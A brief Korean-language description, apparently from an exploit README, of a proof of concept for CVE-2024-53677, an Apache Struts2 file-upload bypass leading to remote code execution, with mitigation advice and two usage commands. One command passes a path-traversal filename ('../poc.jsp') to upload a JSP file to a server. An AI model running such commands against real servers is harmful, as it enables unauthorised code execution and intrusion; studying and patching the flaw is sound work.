
CVE-2024-53677 (S2-067)에 대한 개념 증명 익스플로잇으로, 조작된 파일명 파라미터를 통해 원격 코드 실행을 가능하게 하는 Apache Struts2 파일 업로드 로직 우회입니다.
따라서 완화 수정도 간단합니다. 확장자를 제한하고, 사용자 정의 무작위 파일 이름을 사용하는 등.
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
